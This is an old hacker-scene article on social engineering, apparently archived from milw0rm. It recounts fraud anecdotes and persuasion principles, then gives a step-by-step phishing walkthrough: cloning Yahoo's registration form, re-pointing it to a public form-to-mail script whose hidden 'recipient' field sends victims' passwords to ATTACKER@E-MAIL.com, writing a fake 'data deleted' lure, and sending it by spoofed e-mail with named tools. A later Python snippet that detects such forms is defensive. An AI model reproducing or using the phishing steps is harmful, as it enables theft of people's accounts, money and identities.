Author : <Simo/_6mO_HaCk> simo_at_morx_org
Title : Social Engineering, Definition, true stories and examples
Date : 11/22/2002
True stories
An anonymous person called a woman and said he was from her local
company's customer service and that, due to a local error, some of the
customers' data, including credit card and Social Security numbers,
had been deleted. The caller then asked the lady to give him her
billing information again, including the billing address, first and
last name, the credit card number, expiry date and Social Security
number that had been on file before the incident. 20 days later the
lady received her billing statement with 2500 $ to be paid for what
had been ordered: 1 digital camcorder, 1 laptop, 3 mp3 and 2 dvd players.

Not every hacker is sitting in front of his computer trying to hack
into private networks by exploiting vulnerable servers in order to get
private information such as credit card numbers ... sometimes all they
do is make a call and exploit human stupidity.
"There's always the technical way to break into a network but
sometimes it's easier to go through the people in the company.
You just fool them into giving up their own security," says Keith A. Rhodes,
chief technologist at the U.S. General Accounting Office, which has a
Congressional mandate to test the network security at 24 different
government agencies and departments.
Another true story was recounted by Kapil Raina, currently a security
expert at Verisign and co-author of mCommerce Security: A Beginner's
Guide, based on an actual workplace experience with a previous employer.
The story goes:
One morning a few years back, a group of strangers walked into a
large shipping firm and walked out with access to the firm's entire
corporate network. How did they do it? By obtaining small amounts
of access, bit by bit, from a number of different employees in that
firm. First, they did research about the company for two days before
even attempting to set foot on the premises. For example, they learned
key employees' names by calling HR. Next, they pretended to lose
their key to the front door, and a man let them in. Then they "lost"
their identity badges when entering the third floor secured area,
smiled, and a friendly employee opened the door for them.
The strangers knew the CFO was out of town, so they were able to
enter his office and obtain financial data off his unlocked computer.
They dug through the corporate trash, finding all kinds of useful
documents. They asked a janitor for a garbage pail in which to place
their contents and carried all of this data out of the building in their
hands. The strangers had studied the CFO's voice, so they were able
to phone, pretending to be the CFO, in a rush, desperately in need
of his network password. From there, they used regular technical
hacking tools to gain super-user access into the system.
In this case, the strangers were network consultants performing a
security audit for the CFO without any other employees' knowledge.
They were never given any privileged information from the CFO but
were able to obtain all the access they wanted through social
engineering.
2- Definition
I've read too many articles on social engineering defining the basic
goals of social engineering and the different ways used by hackers;
the goal is simply the same as hacking in general: gaining private
information from a human under some persuasion and influence in order
to perform fraud, espionage, or simply to access a system or a network.
Targets can include commercial companies, financial and cultural
institutions, hospitals or simply a Yahoo account :)
3- Persuasion and influence techniques
A substantial body of literature in social psychology demonstrates
that there are at least six factors relying on peripheral routes to
persuasion that are highly likely to persuade or influence others:
Authority : People are highly likely, in the right situation, to be
highly responsive to assertions of authority, even when the person
who purports to be in a position of authority is not physically present.
A study of three Midwestern hospitals showed how responsive people can
be to such assertions. In the study, 22 separate nurses' stations were
contacted by a researcher who identified himself (falsely) as a hospital
physician, and told the answering nurse to give 20 milligrams of a
specified prescription drug to a particular patient on the ward. Four
factors should have indicated that the nurses might have questioned
the order: It came from a "doctor" with whom the nurse had never before
met or spoken; the "doctor" was transmitting a prescription by telephone,
in violation of hospital policy; the drug in question was not authorized
for use on the wards; and the dosage that the "doctor" had specified was
clearly dangerous, twice the maximum daily dosage. Yet in 95 percent of
the cases, the nurse proceeded to obtain the necessary dosage from the
ward medicine cabinet and was on her way to administer it to the patient
before observers intercepted her and told her of the experiment.
Scarcity : People are also highly responsive to indications that a
particular item they may want is in short supply or available for
only a limited period. Indeed, research by Dr. Jack Brehm of Stanford
University indicates that people come to desire that item even more when
they perceive that their freedom to obtain it is or may be limited in
some way. The belief that others may be competing for the short supply
of the desired item may enhance the person's desire even more.
Liking and similarity. It is a truly human tendency to like people
who are like us. Our identification of a person as having characteristics
identical or similar to our own -- places of birth, or tastes in sports,
music, art, or other personal interests, to name a few -- provides a
strong incentive for us to adopt a mental shortcut, in dealing with that
person, to regard him or her more favorably merely because of that similarity.
Reciprocation. A well-recognized rule of social interaction requires that
if someone gives us (or promises to give us) something, we feel a strong
inclination to reciprocate by providing something in return. Even if the
favor that someone offers was not requested by the other person, the person
offered the favor may feel a strong obligation to respect the rule of
reciprocation by agreeing to the favor that the original offeror asks in
return -- even if that favor is significantly costlier than the original favor.
Commitment and consistency. Society also places great store by consistency
in a person's behavior. If we promise to do something, and fail to carry
out that promise, we are virtually certain to be considered untrustworthy
or undesirable. We therefore are more likely to take considerable pains to
act in ways that are consistent with actions that we have taken before, even
if, in the fullness of time, we later look back and recognize that some
consistencies are indeed foolish. One way in which social custom and
practice makes us susceptible to appeals to consistency is the use of
writing. A leading social psychologist, Professor Robert B. Cialdini,
has observed that unless there is strong evidence to the contrary,
"People have a natural tendency to think that a statement reflects the
true attitude of the person who made it." Moreover, once the person who
receives such a statement responds by preparing a written statement of
his own -- whether a letter, an affidavit, or an e-mail -- it tends to
make the writer believe in what he has written as well, adding to the
impression that both parties have displayed their true attitudes and beliefs.
Social proof : In many social situations, one of the mental shortcuts on
which we rely, in determining what course of action is most appropriate,
is to look to see what other people in the vicinity are doing or saying.
This phenomenon, known as social proof, can prompt us to take actions that
may be against our self-interest without taking the time to consider them
more deeply. Cults from the Jonestown Temple to Heaven's Gate, for example,
provide cogent evidence of how strong the effects of that phenomenon can be
in the right circumstances.
4- Some ways used by hackers
A- Online applications for Internet-fraud purposes:
E-mail passwords and credit card numbers
In this section I'm going to add an influence that has not been
mentioned above, which is the influence of "greed": let's say someone
with an e-mail account somewhere on the net receives a great e-mail
giving him the chance to win 10.000 $ or a Mercedes 2003 as a reward
for just entering his password and username for verification and
registration purposes; sometimes the victim is even asked for his
credit card and Social Security number for the same purpose. Basically
this technique is often used to steal credit cards from online auction
users and web-based e-mail accounts.
The other classic, well-known method is based on the authority
influence and consists of sending an e-mail with a form asking the
victim to re-enter his username/password or fill out a new registration
form due to a local error that erased customers' personal information,
including passwords, dates of birth, and secret question answers.
In fact the attacker doesn't need to be a good html/java/php programmer
to code such forms, nor does he need to bother himself and waste his
time coding html. In this section I'll explain how easy it is to make
online forms and a web server script that gets the data and then sends
it back to the sender's e-mail.
First of all, I know that most of you know how an html post form works
and how the web server script gets the data and then processes it, but
let's get an overview with examples.
How can an attacker easily make a form in sometimes less than 5 minutes?
Let's say we are interested in a Yahoo account password. In that case
the attacker chooses the type of influence; say the attacker decides on
the authority influence. The bad guy first goes to mail.yahoo.com and
tries to sign up for a new account. Guess what he/she gets: a
registration form already written
(http://edit.yahoo.com/config/eval_register?.v=&.intl=&new=1&.done=&.src=ym&.partner=&.p=&promo=&.last=so)
Here we have the form and just need to modify some functions.
The second step is to get the html source of the page in order to
modify it. All we have to do is remove
(<FORM name=IOS onsubmit="return hash(this)"
action=https://edit.yahoo.com/config/register)
which calls the Yahoo web script to process the data being sent, put
in our own script's http address path, and below that remove all these
arguments (used for the Yahoo script):
<INPUT type=hidden value=1 name=.save>
<INPUT type=hidden value=0 name=.accept>
<INPUT type=hidden name=.demog>
<INPUT type=hidden name=.done>
<INPUT type=hidden name=.fam>
<INPUT type=hidden name=.i>
<INPUT type=hidden name=.last>
<INPUT type=hidden value=ym name=.src>
<INPUT type=hidden value=0 name=.regattempts>
<INPUT type=hidden name=.partner>
<INPUT type=hidden name=promo>
<INPUT type=hidden name=.ignore>
<INPUT type=hidden name=.pwtoken>
<INPUT type=hidden value=ets8ig8vfdqbg name=.u>
<INPUT type=hidden value=1 name=.v>
<INPUT type=hidden name=.md5>
<INPUT type=password maxLength=32 name=.pw>
<INPUT type=password maxLength=32 name=.pw2>
and put in the appropriate new web server arguments. Oh wait, I forgot
to mention something: if you look carefully at the Yahoo registration
form you will see some extra java actions, and since we have added our
new web server address we must remove them, otherwise our web script is
not going to be called.
Let's jump to the next part. Now that we have modified the form, we
need to make a small php/perl script to process the data that we wish
to get, so the attacker has two options: make/download a pre-made
php/perl script and put it on a compromised server, or find a public
web mail script. There are thousands of those scripts on the internet
that are already waiting to serve with no verification or restrictions.
They can be located using any search engine like Google or even scanned
for, but note that the attacker should know some script names so he/she
can perform the search successfully; a well-known, often-used script
called form2email.pl can be easily located. After a search using Google
we get a bunch of those, www.alibaweb.net/cgi-bin/services/form2email.pl
as an example. Now all we have to do is include these arguments in the
html form:
<input type=hidden name="recipient" value="ATTACKER@E-MAIL.com">
This is the attacker's e-mail value (where the data will be returned)
<input type=hidden name="subject" value="Successfully hacked">
The e-mail subject
<input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT,REMOTE_ADDR">
Victim's IP address and hostname (not really needed)
<INPUT TYPE="HIDDEN" VALUE="http://mail.yahoo.com" NAME="redirect">
Where we want the web mail script to redirect the victim after submitting
the form; mail.yahoo.com is ideal since he will automatically be
redirected to his mailbox
<INPUT type=password maxLength=32 name="passwd">
<INPUT type=password maxLength=32 name="passwd2">
Our victim's password value, the most important value :]
And finally the attacker adds a message like:
<TD><FONT face=arial color=red><B>Due to an involuntary local error your
informations has been deleted from our database, please take some minutes
to re-fill the following. Your informations will be immediatly recorded
after submiting. Thanks.
</B></FONT>
A pre-coded copy of the above example could be found at:
www.angelfire/linux/simooo/simohackyahoo.html
and an example of a perl web-based e-mailer could also be found at:
www.angelfire/linux/simooo/emailer.pl
(For educational and demonstration purposes only)
Now all the attacker has to do is use one of his compromised servers to
send the spoofed e-mail to his victim, using an e-mail spoofer like
htmlbomb.pl, which can be found at www.morx.org/htmlbomb.txt, or any
program like ghosted.exe for Windows, which already includes a list of
public SMTP servers. The attacker's spoofed e-mail will look like it
comes from admin@yahoo.com or CService@yahoo.com.
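
A defensive check for the lure described above, as an added example
that is not part of the original article: it parses an HTML mail body
and flags any form that collects a password but posts it to a host
outside the claimed sender's domain, or that carries the form-mailer
hidden fields listed above. The function names, the sample form and the
host mailer.example are assumptions made for the illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hidden field names the article's form passes to the form-to-mail script.
MAILER_FIELDS = {"recipient", "subject", "redirect", "env_report"}

# Constructed sample modelled on the form above; mailer.example is a placeholder.
SAMPLE = """<form action="http://mailer.example/cgi-bin/form2email.pl" method="post">
<input type=hidden name="recipient" value="someone@example.org">
<INPUT TYPE="HIDDEN" VALUE="http://mail.yahoo.com" NAME="redirect">
<input type=password maxlength=32 name="passwd">
</form>"""


class FormAudit(HTMLParser):
    """Record each form's action URL, hidden field names and password inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.forms.append({"action": a.get("action", ""), "hidden": set(), "pw": 0})
        elif tag == "input" and self.forms:
            kind = a.get("type", "text").lower()
            if kind == "hidden":
                self.forms[-1]["hidden"].add(a.get("name", "").lower())
            elif kind == "password":
                self.forms[-1]["pw"] += 1


def same_site(host, domain):
    """True when host is the domain itself or one of its subdomains."""
    return host == domain or host.endswith("." + domain)


def audit_message(from_domain, html):
    """Findings for an HTML mail body whose From: header claims from_domain."""
    parser = FormAudit()
    parser.feed(html)
    findings = []
    for form in (f for f in parser.forms if f["pw"]):
        host = (urlparse(form["action"]).hostname or "").lower()
        if host and not same_site(host, from_domain.lower()):
            findings.append(f"password posted to foreign host {host}")
        leaked = sorted(form["hidden"] & MAILER_FIELDS)
        if leaked:
            findings.append("form-mailer fields: " + ",".join(leaked))
    return findings
```

Calling audit_message("yahoo.com", SAMPLE) reports both findings for the
constructed form, while a password form posting to a yahoo.com subdomain
reports none.
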
Influencing the victim can be done in many forms and in many ways, such
as exploiting trust in authority by sending html forms, or attaching
backdoor trojans which would give complete access to the victim's
computer.
A good example of this was an AOL hack, documented by
VIGILANTe: "In that case, the hacker called AOL's tech support
and spoke with the support person for an hour. During the
conversation, the hacker mentioned that his car was for sale cheaply.
The tech supporter was interested, so the hacker sent an e-mail attachment
'with a picture of the car'. Instead of a car photo, the mail executed
a backdoor exploit that opened a connection out from AOL through the firewall."
Online auctions :
Here we can say that 3 of the psychological influences mentioned
above are dominant in these frauds: through the victim's identification
of some good that he is prepared to buy immediately at a price he or
she considers acceptable; reciprocity, through the criminal's promise to
deliver the ordered goods once the victim has sent payment; and similarity,
through the victim's willingness to do business with someone who apparently
shares his or her interests in the collectible or computer merchandise being
sold.
5- Reverse Social Engineering
A final, and advanced, method of gaining valuable information is
known as "reverse social engineering". This is when the hacker
appears in a position of authority so that employees will ask him
for information. If analysed, planned and executed well,
reverse social engineering attacks may offer the hacker an even
better chance of success.
6- Conclusion :
Social engineering has different ways and purposes: hacking e-mail
passwords, credit cards, backdooring and so on. Social engineering just
stays unpatched, since human influence/ignorance/stupidity will keep
existing.
# milw0rm.com [2006-04-08]